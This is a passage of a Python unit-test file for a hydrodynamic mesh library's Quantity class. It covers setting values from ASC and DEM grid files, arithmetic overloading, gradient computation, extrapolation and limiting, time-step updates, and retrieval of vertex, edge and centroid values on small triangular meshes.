mesh4 = Generic_Domain(points, elements)
# geo_reference = Geo_reference(56, x0, y0))
mesh4.check_integrity()
quantity = Quantity(mesh4)
""" Format of asc file
ncols 11
nrows 12
xllcorner 240000
yllcorner 7620000
cellsize 6000
NODATA_value -9999
"""
ncols = 11 # Nx
nrows = 12 # Ny
xllcorner = x0
yllcorner = y0
cellsize = 1.0
NODATA_value = -9999
#xllcorner = 0
#yllcorner = 100
#cellsize = 10
#NODATA_value = -9999
#Create .asc file
#txt_file = tempfile.mktemp(".asc")
txt_file = 'test_asc.asc'
datafile = open(txt_file, "w")
datafile.write('ncols '+str(ncols)+"\n")
datafile.write('nrows '+str(nrows)+"\n")
datafile.write('xllcorner '+str(xllcorner)+"\n")
datafile.write('yllcorner '+str(yllcorner)+"\n")
datafile.write('cellsize '+str(cellsize)+"\n")
datafile.write('NODATA_value '+str(NODATA_value)+"\n")
x = num.linspace(xllcorner, xllcorner+(ncols-1)*cellsize, ncols)
y = num.linspace(yllcorner, yllcorner+(nrows-1)*cellsize, nrows)
points = axes2points(x, y)
#print points
#print x.shape, x
#print y.shape, y
datavalues = linear_function(points)
#print datavalues
datavalues = datavalues.reshape(nrows, ncols)
#print datavalues
#print datavalues.shape
for row in datavalues:
#print row
datafile.write(" ".join(str(elem) for elem in row) + "\n")
datafile.close()
#print quantity.vertex_values
#print quantity.centroid_values
quantity.set_values(filename=txt_file,
location='vertices',
indices=None,
verbose=False)
# check order of vertices
answer = [[6., 0., 2.],
[6., 2., 8.],
[8., 2., 4.],
[12., 6., 8.]]
#print quantity.vertex_values
assert num.allclose(quantity.vertex_values, answer)
#print quantity.vertex_values
#print quantity.centroid_values
quantity.set_values(0.0)
#print quantity.vertex_values
#print quantity.centroid_values
quantity.set_values(filename=txt_file,
location='centroids',
indices=None,
verbose=False)
#print quantity.vertex_values
#print quantity.centroid_values
answer = [2.66666667, 5.33333333, 4.66666667, 8.66666667]
assert num.allclose(quantity.centroid_values, answer)
# check dem file
# use the same reference solution used above for testing
# convert test_asc.asc file to .dem file
txt_file_prj = 'test_asc.prj'
fid = open(txt_file_prj, 'w')
fid.write("""Projection UTM
Zone 56
Datum WGS84
Zunits NO
Units METERS
Spheroid WGS84
Xshift 0.0000000000
Yshift 10000000.0000000000
Parameters
""")
fid.close()
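# Assumption: asc2dem picks up the .prj file written above for projection
# metadata when converting the .asc grid; the test itself only checks the
# values that come back from set_values.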
txt_file_dem = 'test_asc.dem'
asc2dem(name_in=txt_file, name_out='test_asc',
use_cache=False, verbose=False)
quantity.set_values(0.0)
quantity.set_values(filename=txt_file_dem,
location='vertices',
indices=None,
verbose=False)
# check order of vertices
answer = [[6., 0., 2.],
[6., 2., 8.],
[8., 2., 4.],
[12., 6., 8.]]
#print quantity.vertex_values
#print quantity.vertex_values, 'vertex values'
assert num.allclose(quantity.vertex_values, answer)
#print quantity.vertex_values
#print quantity.centroid_values
quantity.set_values(0.0)
#print quantity.vertex_values
#print quantity.centroid_values
quantity.set_values(filename=txt_file_dem,
location='centroids',
indices=None,
verbose=False)
#print quantity.vertex_values
#print quantity.centroid_values , 'centroid values'
answer = [2.66666667, 5.33333333, 4.66666667, 8.66666667]
assert num.allclose(quantity.centroid_values, answer)
#Cleanup
#import os
try:
os.remove(txt_file)
os.remove(txt_file_prj)
os.remove(txt_file_dem)
except OSError:
pass
def test_set_values_from_quantity(self):
quantity1 = Quantity(self.mesh4)
quantity1.set_vertex_values([0, 1, 2, 3, 4, 5])
assert num.allclose(quantity1.vertex_values,
[[1, 0, 2], [1, 2, 4], [4, 2, 5], [3, 1, 4]])
quantity2 = Quantity(self.mesh4)
quantity2.set_values(quantity=quantity1)
assert num.allclose(quantity2.vertex_values,
[[1, 0, 2], [1, 2, 4], [4, 2, 5], [3, 1, 4]])
quantity2.set_values(quantity=2*quantity1)
assert num.allclose(quantity2.vertex_values,
[[2, 0, 4], [2, 4, 8], [8, 4, 10], [6, 2, 8]])
quantity2.set_values(quantity=2*quantity1 + 3)
assert num.allclose(quantity2.vertex_values,
[[5, 3, 7], [5, 7, 11], [11, 7, 13], [9, 5, 11]])
#Check detection of quantity as first argument
quantity2.set_values(2*quantity1 + 3)
assert num.allclose(quantity2.vertex_values,
[[5, 3, 7], [5, 7, 11], [11, 7, 13], [9, 5, 11]])
def Xtest_set_values_from_quantity_using_polygon(self):
"""test_set_values_from_quantity_using_polygon(self):
Check that polygon can be used to restrict set_values when
using another quantity as argument.
"""
# Create restricting polygon (containing node #4 (2,2) and
# centroid of triangle #1 (bce)
polygon = [[1.0, 1.0], [4.0, 1.0],
[4.0, 4.0], [1.0, 4.0]]
assert num.allclose(inside_polygon(self.mesh4.nodes, polygon), 4)
quantity1 = Quantity(self.mesh4)
quantity1.set_vertex_values([0, 1, 2, 3, 4, 5])
assert num.allclose(quantity1.vertex_values,
[[1, 0, 2], [1, 2, 4], [4, 2, 5], [3, 1, 4]])
quantity2 = Quantity(self.mesh4)
quantity2.set_values(quantity=quantity1,
polygon=polygon)
msg = 'Only node #4(e) at (2,2) should have values applied '
assert num.allclose(quantity2.vertex_values,
[[0, 0, 0], [0, 0, 4], [4, 0, 0], [0, 0, 4]]), msg
#bac, bce, ecf, dbe
def test_overloading(self):
quantity1 = Quantity(self.mesh4)
quantity1.set_vertex_values([0, 1, 2, 3, 4, 5])
assert num.allclose(quantity1.vertex_values,
[[1, 0, 2], [1, 2, 4], [4, 2, 5], [3, 1, 4]])
quantity2 = Quantity(self.mesh4)
quantity2.set_values([[1, 2, 3], [5, 5, 5], [0, 0, 9], [-6, 3, 3]],
location='vertices')
quantity3 = Quantity(self.mesh4)
quantity3.set_values([[2, 2, 2], [7, 8, 9], [7, 6, 3], [3, 8, -8]],
location='vertices')
# Negation
Q = -quantity1
assert num.allclose(Q.vertex_values, -quantity1.vertex_values)
assert num.allclose(Q.centroid_values, -quantity1.centroid_values)
assert num.allclose(Q.edge_values, -quantity1.edge_values)
# Addition
Q = quantity1 + 7
assert num.allclose(Q.vertex_values, quantity1.vertex_values + 7)
assert num.allclose(Q.centroid_values, quantity1.centroid_values + 7)
assert num.allclose(Q.edge_values, quantity1.edge_values + 7)
Q = 7 + quantity1
assert num.allclose(Q.vertex_values, quantity1.vertex_values + 7)
assert num.allclose(Q.centroid_values, quantity1.centroid_values + 7)
assert num.allclose(Q.edge_values, quantity1.edge_values + 7)
Q = quantity1 + quantity2
assert num.allclose(Q.vertex_values,
quantity1.vertex_values + quantity2.vertex_values)
assert num.allclose(Q.centroid_values,
quantity1.centroid_values + quantity2.centroid_values)
assert num.allclose(Q.edge_values,
quantity1.edge_values + quantity2.edge_values)
Q = quantity1 + quantity2 - 3
assert num.allclose(Q.vertex_values,
quantity1.vertex_values + quantity2.vertex_values - 3)
Q = quantity1 - quantity2
assert num.allclose(Q.vertex_values,
quantity1.vertex_values - quantity2.vertex_values)
#Scaling
Q = quantity1*3
assert num.allclose(Q.vertex_values, quantity1.vertex_values*3)
assert num.allclose(Q.centroid_values, quantity1.centroid_values*3)
assert num.allclose(Q.edge_values, quantity1.edge_values*3)
Q = 3*quantity1
assert num.allclose(Q.vertex_values, quantity1.vertex_values*3)
#Multiplication
Q = quantity1 * quantity2
#print Q.vertex_values
#print Q.centroid_values
#print quantity1.centroid_values
#print quantity2.centroid_values
assert num.allclose(Q.vertex_values,
quantity1.vertex_values * quantity2.vertex_values)
#Linear combinations
Q = 4*quantity1 + 2
assert num.allclose(Q.vertex_values,
4*quantity1.vertex_values + 2)
Q = quantity1*quantity2 + 2
assert num.allclose(Q.vertex_values,
quantity1.vertex_values * quantity2.vertex_values + 2)
Q = quantity1*quantity2 + quantity3
assert num.allclose(Q.vertex_values,
quantity1.vertex_values * quantity2.vertex_values
+ quantity3.vertex_values)
Q = quantity1*quantity2 + 3*quantity3
assert num.allclose(Q.vertex_values,
quantity1.vertex_values * quantity2.vertex_values
+ 3*quantity3.vertex_values)
Q = quantity1*quantity2 + 3*quantity3 + 5.0
assert num.allclose(Q.vertex_values,
quantity1.vertex_values * quantity2.vertex_values
+ 3*quantity3.vertex_values + 5)
Q = quantity1*quantity2 - quantity3
assert num.allclose(Q.vertex_values,
quantity1.vertex_values * quantity2.vertex_values
- quantity3.vertex_values)
Q = 1.5*quantity1*quantity2 - 3*quantity3 + 5.0
assert num.allclose(Q.vertex_values,
1.5*quantity1.vertex_values * quantity2.vertex_values
- 3*quantity3.vertex_values + 5)
#Try combining quantities and arrays and scalars
Q = 1.5*quantity1*quantity2.vertex_values -\
3*quantity3.vertex_values + 5.0
assert num.allclose(Q.vertex_values,
1.5*quantity1.vertex_values * quantity2.vertex_values
- 3*quantity3.vertex_values + 5)
#Powers
Q = quantity1**2
assert num.allclose(Q.vertex_values, quantity1.vertex_values**2)
Q = quantity1**2 + quantity2**2
assert num.allclose(Q.vertex_values,
quantity1.vertex_values**2
+ quantity2.vertex_values**2)
Q = (quantity1**2 + quantity2**2)**0.5
assert num.allclose(Q.vertex_values,
(quantity1.vertex_values**2 +
quantity2.vertex_values**2)**0.5)
def test_compute_gradient(self):
quantity = Quantity(self.mesh4)
#Set up for a gradient of (2,0) at mid triangle
quantity.set_values([2.0, 4.0, 6.0, 2.0],
location='centroids')
#Gradients
quantity.compute_gradients()
a = quantity.x_gradient
b = quantity.y_gradient
#print self.mesh4.centroid_coordinates
#print a, b
#The central triangle (1)
#(using standard gradient based on neighbours' centroid values)
assert num.allclose(a[1], 2.0)
assert num.allclose(b[1], 0.0)
#Left triangle (0) using two point gradient
#q0 = q1 + a*(x0-x1) + b*(y0-y1) <=>
#2 = 4 + a*(-2/3) + b*(-2/3)
assert num.allclose(a[0] + b[0], 3)
#From orthogonality (a*(y0-y1) + b*(x0-x1) == 0)
assert num.allclose(a[0] - b[0], 0)
#Right triangle (2) using two point gradient
#q2 = q1 + a*(x2-x1) + b*(y2-y1) <=>
#6 = 4 + a*(4/3) + b*(-2/3)
assert num.allclose(2*a[2] - b[2], 3)
#From orthogonality (a*(y1-y2) + b*(x2-x1) == 0)
assert num.allclose(a[2] + 2*b[2], 0)
#Top triangle (3) using two point gradient
#q3 = q1 + a*(x3-x1) + b*(y3-y1) <=>
#2 = 4 + a*(-2/3) + b*(4/3)
assert num.allclose(a[3] - 2*b[3], 3)
#From orthogonality (a*(y1-y3) + b*(x3-x1) == 0)
assert num.allclose(2*a[3] + b[3], 0)
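#Solving each pair of equations gives (a, b) = (1.5, 1.5) for triangle 0,
#(1.2, -0.6) for triangle 2 and (0.6, -1.2) for triangle 3, which is what
#the extrapolated vertex values below are checked against.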
#print a, b
quantity.extrapolate_second_order()
#Apply q(x,y) = qc + a*(x-xc) + b*(y-yc)
assert num.allclose(quantity.vertex_values[0, :], [3., 0., 3.])
assert num.allclose(quantity.vertex_values[1, :], [
4./3, 16./3, 16./3])
#a = 1.2, b=-0.6
#q(4,0) = 6 + a*(4 - 8/3) + b*(-2/3)
assert num.allclose(quantity.vertex_values[2, 2], 8)
def test_get_gradients(self):
quantity = Quantity(self.mesh4)
#Set up for a gradient of (2,0) at mid triangle
quantity.set_values([2.0, 4.0, 6.0, 2.0],
location='centroids')
#Gradients
quantity.compute_gradients()
a, b = quantity.get_gradients()
#print self.mesh4.centroid_coordinates
#print a, b
#The central triangle (1)
#(using standard gradient based on neighbours' centroid values)
assert num.allclose(a[1], 2.0)
assert num.allclose(b[1], 0.0)
#Left triangle (0) using two point gradient
#q0 = q1 + a*(x0-x1) + b*(y0-y1) <=>
#2 = 4 + a*(-2/3) + b*(-2/3)
assert num.allclose(a[0] + b[0], 3)
#From orthogonality (a*(y0-y1) + b*(x0-x1) == 0)
assert num.allclose(a[0] - b[0], 0)
#Right triangle (2) using two point gradient
#q2 = q1 + a*(x2-x1) + b*(y2-y1) <=>
#6 = 4 + a*(4/3) + b*(-2/3)
assert num.allclose(2*a[2] - b[2], 3)
#From orthogonality (a*(y1-y2) + b*(x2-x1) == 0)
assert num.allclose(a[2] + 2*b[2], 0)
#Top triangle (3) using two point gradient
#q3 = q1 + a*(x3-x1) + b*(y3-y1) <=>
#2 = 4 + a*(-2/3) + b*(4/3)
assert num.allclose(a[3] - 2*b[3], 3)
#From orthogonality (a*(y1-y3) + b*(x3-x1) == 0)
assert num.allclose(2*a[3] + b[3], 0)
def test_second_order_extrapolation2(self):
quantity = Quantity(self.mesh4)
#Set up for a gradient of (3,1), f(x) = 3x+y
quantity.set_values([2.0+2.0/3, 4.0+4.0/3, 8.0+2.0/3, 2.0+8.0/3],
location='centroids')
#Gradients
quantity.compute_gradients()
a = quantity.x_gradient
b = quantity.y_gradient
#print a, b
assert num.allclose(a[1], 3.0)
assert num.allclose(b[1], 1.0)
#Work out the others
quantity.extrapolate_second_order()
#print quantity.vertex_values
assert num.allclose(quantity.vertex_values[1, 0], 2.0)
assert num.allclose(quantity.vertex_values[1, 1], 6.0)
assert num.allclose(quantity.vertex_values[1, 2], 8.0)
def test_backup_saxpy_centroid_values(self):
quantity = Quantity(self.mesh4)
#Set up for a gradient of (3,1), f(x) = 3x+y
c_values = num.array([2.0+2.0/3, 4.0+4.0/3, 8.0+2.0/3, 2.0+8.0/3])
d_values = num.array([1.0, 2.0, 3.0, 4.0])
quantity.set_values(c_values, location='centroids')
#Backup
quantity.backup_centroid_values()
#print quantity.vertex_values
assert num.allclose(quantity.centroid_values,
quantity.centroid_backup_values)
quantity.set_values(d_values, location='centroids')
quantity.saxpy_centroid_values(2.0, 3.0)
assert num.allclose(quantity.centroid_values,
2.0*d_values + 3.0*c_values)
def test_first_order_extrapolator(self):
quantity = Quantity(self.mesh4)
#Test centroids
quantity.set_values([1., 2., 3., 4.], location='centroids')
assert num.allclose(quantity.centroid_values, [1, 2, 3, 4]) # Centroid
#Extrapolate
quantity.extrapolate_first_order()
#Check that gradient is zero
a, b = quantity.get_gradients()
assert num.allclose(a, [0, 0, 0, 0])
assert num.allclose(b, [0, 0, 0, 0])
#Check vertices but not edge values
assert num.allclose(quantity.vertex_values,
[[1, 1, 1], [2, 2, 2], [3, 3, 3], [4, 4, 4]])
def test_second_order_extrapolator(self):
quantity = Quantity(self.mesh4)
#Set up for a gradient of (3,0) at mid triangle
quantity.set_values([2.0, 4.0, 8.0, 2.0],
location='centroids')
quantity.extrapolate_second_order()
quantity.limit()
#Assert that central triangle is limited by neighbours
assert quantity.vertex_values[1, 0] >= quantity.vertex_values[0, 0]
assert quantity.vertex_values[1, 0] >= quantity.vertex_values[3, 1]
assert quantity.vertex_values[1, 1] <= quantity.vertex_values[2, 1]
assert quantity.vertex_values[1, 1] >= quantity.vertex_values[0, 2]
assert quantity.vertex_values[1, 2] <= quantity.vertex_values[2, 0]
assert quantity.vertex_values[1, 2] >= quantity.vertex_values[3, 1]
#Assert that quantities are conserved
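#(the limiter only scales the deviation of vertex values about each
#centroid, so each centroid should still equal its vertex average)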
for k in range(quantity.centroid_values.shape[0]):
assert num.allclose(quantity.centroid_values[k],
old_div(num.sum(quantity.vertex_values[k, :]),3))
def test_limit_vertices_by_all_neighbours(self):
quantity = Quantity(self.mesh4)
#Create a deliberate overshoot (e.g. from gradient computation)
quantity.set_values([[3, 0, 3], [2, 2, 6], [5, 3, 8], [8, 3, 5]])
#Limit
quantity.limit_vertices_by_all_neighbours()
#Assert that central triangle is limited by neighbours
assert quantity.vertex_values[1, 0] >= quantity.vertex_values[0, 0]
assert quantity.vertex_values[1, 0] <= quantity.vertex_values[3, 1]
assert quantity.vertex_values[1, 1] <= quantity.vertex_values[2, 1]
assert quantity.vertex_values[1, 1] >= quantity.vertex_values[0, 2]
assert quantity.vertex_values[1, 2] <= quantity.vertex_values[2, 0]
assert quantity.vertex_values[1, 2] <= quantity.vertex_values[3, 1]
#Assert that quantities are conserved
for k in range(quantity.centroid_values.shape[0]):
assert num.allclose(quantity.centroid_values[k],
old_div(num.sum(quantity.vertex_values[k, :]),3))
def test_limit_edges_by_all_neighbours(self):
quantity = Quantity(self.mesh4)
#Create a deliberate overshoot (e.g. from gradient computation)
quantity.set_values([[3, 0, 3], [2, 2, 6], [5, 3, 8], [8, 3, 5]])
#Limit
quantity.limit_edges_by_all_neighbours()
#Assert that central triangle is limited by neighbours
assert quantity.edge_values[1, 0] <= quantity.centroid_values[2]
assert quantity.edge_values[1, 0] >= quantity.centroid_values[0]
assert quantity.edge_values[1, 1] <= quantity.centroid_values[2]
assert quantity.edge_values[1, 1] >= quantity.centroid_values[0]
assert quantity.edge_values[1, 2] <= quantity.centroid_values[2]
assert quantity.edge_values[1, 2] >= quantity.centroid_values[0]
#Assert that quantities are conserved
for k in range(quantity.centroid_values.shape[0]):
assert num.allclose(quantity.centroid_values[k],
old_div(num.sum(quantity.vertex_values[k, :]),3))
def test_limit_edges_by_neighbour(self):
quantity = Quantity(self.mesh4)
#Create a deliberate overshoot (e.g. from gradient computation)
quantity.set_values([[3, 0, 3], [2, 2, 6], [5, 3, 8], [8, 3, 5]])
#Limit
quantity.limit_edges_by_neighbour()
#Assert that central triangle is limited by neighbours
assert quantity.edge_values[1, 0] <= quantity.centroid_values[3]
assert quantity.edge_values[1, 0] >= quantity.centroid_values[1]
assert quantity.edge_values[1, 1] <= quantity.centroid_values[2]
assert quantity.edge_values[1, 1] >= quantity.centroid_values[1]
assert quantity.edge_values[1, 2] <= quantity.centroid_values[1]
assert quantity.edge_values[1, 2] >= quantity.centroid_values[0]
#Assert that quantities are conserved
for k in range(quantity.centroid_values.shape[0]):
assert num.allclose(quantity.centroid_values[k],
old_div(num.sum(quantity.vertex_values[k, :]),3))
def test_limiter2(self):
"""Taken from test_shallow_water
"""
quantity = Quantity(self.mesh4)
quantity.domain.beta_w = 0.9
#Test centroids
quantity.set_values([2., 4., 8., 2.], location='centroids')
assert num.allclose(quantity.centroid_values, [2, 4, 8, 2]) # Centroid
#Extrapolate
quantity.extrapolate_second_order()
assert num.allclose(quantity.vertex_values[1, :], [0.0, 6, 6])
#Limit
quantity.limit()
# limited value for beta_w = 0.9
assert num.allclose(quantity.vertex_values[1, :], [2.2, 4.9, 4.9])
# limited values for beta_w = 0.5
#assert allclose(quantity.vertex_values[1,:], [3.0, 4.5, 4.5])
#Assert that quantities are conserved
for k in range(quantity.centroid_values.shape[0]):
assert num.allclose(quantity.centroid_values[k],
old_div(num.sum(quantity.vertex_values[k, :]),3))
def test_distribute_first_order(self):
quantity = Quantity(self.mesh4)
#Test centroids
quantity.set_values([1., 2., 3., 4.], location='centroids')
assert num.allclose(quantity.centroid_values, [1, 2, 3, 4]) # Centroid
#Extrapolate from centroid to vertices and edges
quantity.extrapolate_first_order()
#Interpolate
#quantity.interpolate_from_vertices_to_edges()
assert num.allclose(quantity.vertex_values,
[[1, 1, 1], [2, 2, 2], [3, 3, 3], [4, 4, 4]])
assert num.allclose(quantity.edge_values, [[1, 1, 1], [2, 2, 2],
[3, 3, 3], [4, 4, 4]])
def test_interpolate_from_vertices_to_edges(self):
quantity = Quantity(self.mesh4)
quantity.vertex_values = num.array(
[[1, 0, 2], [1, 2, 4], [4, 2, 5], [3, 1, 4]], float)
quantity.interpolate_from_vertices_to_edges()
assert num.allclose(quantity.edge_values, [[1., 1.5, 0.5],
[3., 2.5, 1.5],
[3.5, 4.5, 3.],
[2.5, 3.5, 2]])
def test_interpolate_from_edges_to_vertices(self):
quantity = Quantity(self.mesh4)
quantity.edge_values = num.array([[1., 1.5, 0.5],
[3., 2.5, 1.5],
[3.5, 4.5, 3.],
[2.5, 3.5, 2]], float)
quantity.interpolate_from_edges_to_vertices()
assert num.allclose(quantity.vertex_values,
[[1, 0, 2], [1, 2, 4], [4, 2, 5], [3, 1, 4]])
def test_distribute_second_order(self):
quantity = Quantity(self.mesh4)
#Test centroids
quantity.set_values([2., 4., 8., 2.], location='centroids')
assert num.allclose(quantity.centroid_values, [2, 4, 8, 2]) # Centroid
#Extrapolate
quantity.extrapolate_second_order()
assert num.allclose(quantity.vertex_values[1, :], [0.0, 6, 6])
def test_update_explicit(self):
quantity = Quantity(self.mesh4)
#Test centroids
quantity.set_values([1., 2., 3., 4.], location='centroids')
assert num.allclose(quantity.centroid_values, [1, 2, 3, 4]) # Centroid
#Set explicit_update
quantity.explicit_update = num.array([1., 1., 1., 1.])
#Update with given timestep
quantity.update(0.1)
x = num.array([1, 2, 3, 4]) + num.array([.1, .1, .1, .1])
assert num.allclose(quantity.centroid_values, x)
def test_update_semi_implicit(self):
quantity = Quantity(self.mesh4)
#Test centroids
quantity.set_values([1., 2., 3., 4.], location='centroids')
assert num.allclose(quantity.centroid_values, [1, 2, 3, 4]) # Centroid
#Set semi implicit update
quantity.semi_implicit_update = num.array([1., 1., 1., 1.])
#Update with given timestep
timestep = 0.1
quantity.update(timestep)
sem = old_div(num.array([1., 1., 1., 1.]),num.array([1, 2, 3, 4]))
denom = num.ones(4, float)-timestep*sem
x = old_div(num.array([1, 2, 3, 4]),denom)
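#The semi-implicit source appears to be treated as S*q_new/q_old
#(with S = semi_implicit_update), so q_new = q_old + dt*S*q_new/q_old,
#i.e. q_new = q_old/(1 - dt*S/q_old) -- which is what sem/denom compute.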
assert num.allclose(quantity.centroid_values, x)
def test_both_updates(self):
quantity = Quantity(self.mesh4)
#Test centroids
quantity.set_values([1., 2., 3., 4.], location='centroids')
assert num.allclose(quantity.centroid_values, [1, 2, 3, 4]) # Centroid
#Set explicit_update
quantity.explicit_update = num.array([4., 3., 2., 1.])
#Set semi implicit update
quantity.semi_implicit_update = num.array([1., 1., 1., 1.])
#Update with given timestep
timestep = 0.1
quantity.update(0.1)
sem = old_div(num.array([1., 1., 1., 1.]),num.array([1, 2, 3, 4]))
denom = num.ones(4, float)-timestep*sem
x = num.array([1., 2., 3., 4.])
x += timestep*num.array([4.0, 3.0, 2.0, 1.0])
x /= denom
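#i.e. q_new = (q_old + dt*explicit_update)/(1 - dt*semi_implicit_update/q_old),
#combining the explicit and semi-implicit updates tested separately above.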
assert num.allclose(quantity.centroid_values, x)
def set_array_values_by_index(self):
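#NOTE: without a 'test_' prefix this method is never collected by
#unittest.makeSuite below, so it appears to be deliberately disabled.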
from anuga.abstract_2d_finite_volumes.mesh_factory import rectangular
#Create basic mesh
points, vertices, boundary = rectangular(1, 1)
#Create shallow water domain
domain = Generic_Domain(points, vertices, boundary)
#print "domain.number_of_elements ",domain.number_of_elements
quantity = Quantity(domain, [[1, 1, 1], [2, 2, 2]])
value = [7]
indices = [1]
quantity.set_array_values_by_index(value,
location='centroids',
indices=indices)
#print "quantity.centroid_values",quantity.centroid_values
assert num.allclose(quantity.centroid_values, [1, 7])
quantity.set_array_values([15, 20, 25], indices=indices)
assert num.allclose(quantity.centroid_values, [1, 20])
quantity.set_array_values([15, 20, 25], indices=indices)
assert num.allclose(quantity.centroid_values, [1, 20])
def test_setting_some_vertex_values(self):
"""
set values based on triangle lists.
"""
from anuga.abstract_2d_finite_volumes.mesh_factory import rectangular
#Create basic mesh
points, vertices, boundary = rectangular(1, 3)
#print "vertices",vertices
#Create shallow water domain
domain = Generic_Domain(points, vertices, boundary)
#print "domain.number_of_elements ",domain.number_of_elements
quantity = Quantity(domain, [[1, 1, 1], [2, 2, 2], [3, 3, 3],
[4, 4, 4], [5, 5, 5], [6, 6, 6]])
# Check that constants work
value = 7
indices = [1]
quantity.set_values(value,
location='centroids',
indices=indices)
#print "quantity.centroid_values",quantity.centroid_values
assert num.allclose(quantity.centroid_values, [1, 7, 3, 4, 5, 6])
value = [7]
indices = [1]
quantity.set_values(value,
location='centroids',
indices=indices)
#print "quantity.centroid_values",quantity.centroid_values
assert num.allclose(quantity.centroid_values, [1, 7, 3, 4, 5, 6])
value = [[15, 20, 25]]
quantity.set_values(value, indices=indices)
#print "1 quantity.vertex_values",quantity.vertex_values
assert num.allclose(quantity.vertex_values[1], value[0])
#print "quantity",quantity.vertex_values
values = [10, 100, 50]
quantity.set_values(values, indices=[0, 1, 5], location='centroids')
#print "2 quantity.vertex_values",quantity.vertex_values
assert num.allclose(quantity.vertex_values[0], [10, 10, 10])
assert num.allclose(quantity.vertex_values[5], [50, 50, 50])
#quantity.interpolate()
#print "quantity.centroid_values",quantity.centroid_values
assert num.allclose(quantity.centroid_values, [10, 100, 3, 4, 5, 50])
quantity = Quantity(domain, [[1, 1, 1], [2, 2, 2], [3, 3, 3],
[4, 4, 4], [5, 5, 5], [6, 6, 6]])
values = [10, 100, 50]
#this will be per unique vertex, indexing the vertices
#print "quantity.vertex_values",quantity.vertex_values
quantity.set_values(values, indices=[0, 1, 5])
#print "quantity.vertex_values",quantity.vertex_values
assert num.allclose(quantity.vertex_values[0], [1, 50, 10])
assert num.allclose(quantity.vertex_values[5], [6, 6, 6])
assert num.allclose(quantity.vertex_values[1], [100, 10, 50])
quantity = Quantity(domain, [[1, 1, 1], [2, 2, 2], [3, 3, 3],
[4, 4, 4], [5, 5, 5], [6, 6, 6]])
values = [[31, 30, 29], [400, 400, 400], [1000, 999, 998]]
quantity.set_values(values, indices=[3, 3, 5])
quantity.interpolate()
assert num.allclose(quantity.centroid_values, [1, 2, 3, 400, 5, 999])
values = [[1, 1, 1], [2, 2, 2], [3, 3, 3],
[4, 4, 4], [5, 5, 5], [6, 6, 6]]
quantity.set_values(values)
# testing the standard set values by vertex
# indexed by vertex_id in general_mesh.coordinates
values = [0, 1, 2, 3, 4, 5, 6, 7]
quantity.set_values(values)
#print "1 quantity.vertex_values",quantity.vertex_values
assert num.allclose(quantity.vertex_values, [[4., 5., 0.],
[1., 0., 5.],
[5., 6., 1.],
[2., 1., 6.],
[6., 7., 2.],
[3., 2., 7.]])
def test_setting_unique_vertex_values(self):
"""
set values based on unique_vertex lists.
"""
from anuga.abstract_2d_finite_volumes.mesh_factory import rectangular
#Create basic mesh
points, vertices, boundary = rectangular(1, 3)
#print "vertices",vertices
#Create shallow water domain
domain = Generic_Domain(points, vertices, boundary)
#print "domain.number_of_elements ",domain.number_of_elements
quantity = Quantity(domain, [[0, 0, 0], [1, 1, 1], [2, 2, 2], [3, 3, 3],
[4, 4, 4], [5, 5, 5]])
value = 7
indices = [1, 5]
quantity.set_values(value,
location='unique vertices',
indices=indices)
#print "quantity.centroid_values",quantity.centroid_values
assert num.allclose(quantity.vertex_values[0], [0, 7, 0])
assert num.allclose(quantity.vertex_values[1], [7, 1, 7])
assert num.allclose(quantity.vertex_values[2], [7, 2, 7])
def test_get_values(self):
"""
get values based on triangle lists.
"""
from anuga.abstract_2d_finite_volumes.mesh_factory import rectangular
#Create basic mesh
points, vertices, boundary = rectangular(1, 3)
#print "points",points
#print "vertices",vertices
#print "boundary",boundary
#Create shallow water domain
domain = Generic_Domain(points, vertices, boundary)
#print "domain.number_of_elements ",domain.number_of_elements
quantity = Quantity(domain, [[0, 0, 0], [1, 1, 1], [2, 2, 2], [3, 3, 3],
[4, 4, 4], [5, 5, 5]])
#print "quantity.get_values(location = 'unique vertices')", \
# quantity.get_values(location = 'unique vertices')
#print "quantity.get_values(location = 'unique vertices')", \
# quantity.get_values(indices=[0,1,2,3,4,5,6,7], \
# location = 'unique vertices')
answer = [0.5, 2, 4, 5, 0, 1, 3, 4.5]
assert num.allclose(answer,
quantity.get_values(location='unique vertices'))
indices = [0, 5, 3]
answer = [0.5, 1, 5]
assert num.allclose(answer,
quantity.get_values(indices=indices,
location='unique vertices'))
#print "quantity.centroid_values",quantity.centroid_values
#print "quantity.get_values(location = 'centroids') ",\
# quantity.get_values(location = 'centroids')
def test_get_values_2(self):
"""Different mesh (working with domain object) - also check centroids.
"""
a = [0.0, 0.0]
b = [0.0, 2.0]
c = [2.0, 0.0]
d = [0.0, 4.0]
e = [2.0, 2.0]
f = [4.0, 0.0]
points = [a, b, c, d, e, f]
#bac, bce, ecf, dbe
vertices = [[1, 0, 2], [1, 2, 4], [4, 2, 5], [3, 1, 4]]
domain = Generic_Domain(points, vertices)
quantity = Quantity(domain)
quantity.set_values(lambda x, y: x+2*y) # 2 4 4 6
assert num.allclose(quantity.get_values(location='centroids'),
[2, 4, 4, 6])
assert num.allclose(quantity.get_values(location='centroids',
indices=[1, 3]), [4, 6])
assert num.allclose(quantity.get_values(location='vertices'),
[[4, 0, 2],
[4, 2, 6],
[6, 2, 4],
[8, 4, 6]])
assert num.allclose(quantity.get_values(location='vertices',
indices=[1, 3]), [[4, 2, 6],
[8, 4, 6]])
assert num.allclose(quantity.get_values(location='edges'),
[[1, 3, 2],
[4, 5, 3],
[3, 5, 4],
[5, 7, 6]])
assert num.allclose(quantity.get_values(location='edges',
indices=[1, 3]),
[[4, 5, 3],
[5, 7, 6]])
# Check averaging over vertices
#a: 0
#b: (4+4+4)/3
#c: (2+2+2)/3
#d: 8
#e: (6+6+6)/3
#f: 4
assert num.allclose(quantity.get_values(location='unique vertices'),
[0, 4, 2, 8, 6, 4])
def test_get_vertex_values(self):
"""
get values based on triangle lists.
"""
from anuga.abstract_2d_finite_volumes.mesh_factory import rectangular
#Create basic mesh
points, vertices, boundary = rectangular(1, 3)
#print "points",points
#print "vertices",vertices
#print "boundary",boundary
#Create shallow water domain
domain = Generic_Domain(points, vertices, boundary)
#print "domain.number_of_elements ",domain.number_of_elements
quantity = Quantity(domain, [[0, 0, 0], [1, 1, 1], [2, 2, 2], [3, 3, 3],
[4, 4, 4], [5, 5, 5]])
#======================================================
# Default: get_vertex_values just returns the individual
# vertex values within each triangle
#======================================================
Q, V = quantity.get_vertex_values(xy=False)
answer = [0., 0., 0., 1., 1., 1., 2., 2., 2., 3., 3., 3., 4.,
4., 4., 5., 5., 5.]
v_answer = num.array([[0, 1, 2],
[3, 4, 5],
[6, 7, 8],
[9, 10, 11],
[12, 13, 14],
[15, 16, 17]])
assert num.allclose(answer, Q)
assert num.allclose(v_answer, V)
#======================================================
# Set output to be smooth, so get one unique value at
